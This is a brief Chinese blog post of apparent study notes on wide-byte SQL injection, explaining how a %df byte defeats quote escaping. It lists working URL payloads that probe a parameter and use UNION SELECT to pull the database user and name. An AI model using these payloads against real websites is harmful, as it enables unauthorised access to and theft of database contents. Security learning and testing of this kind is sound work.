会员
周边
众包
新闻
博问
闪存
赞助商
所有博客
当前博客
我的博客
我的园子
账号设置
简洁模式
...
退出登录
注册
登录
baimuyangren
博客园
首页
新随笔
联系
订阅
管理
10.宽字节注入
原理
利用%df使注入语句逃逸
代码审计
黑盒测试下的宽字节注入
试探
字符型试探
?id=1%df%27%23
试探成功
注入获取敏感信息
?id=1%df%27 union select 1,2,3%23
?id=%df%27 union select 1,user(),database() %23
这里的关键要让第一个语句错误 :?id=%df%27
这里让第一个语句直接错误
posted @
2023-11-11 10:35
白牧羊人
阅读(
4
) 评论(
0
)
编辑
收藏
举报
刷新页面
返回顶部
公告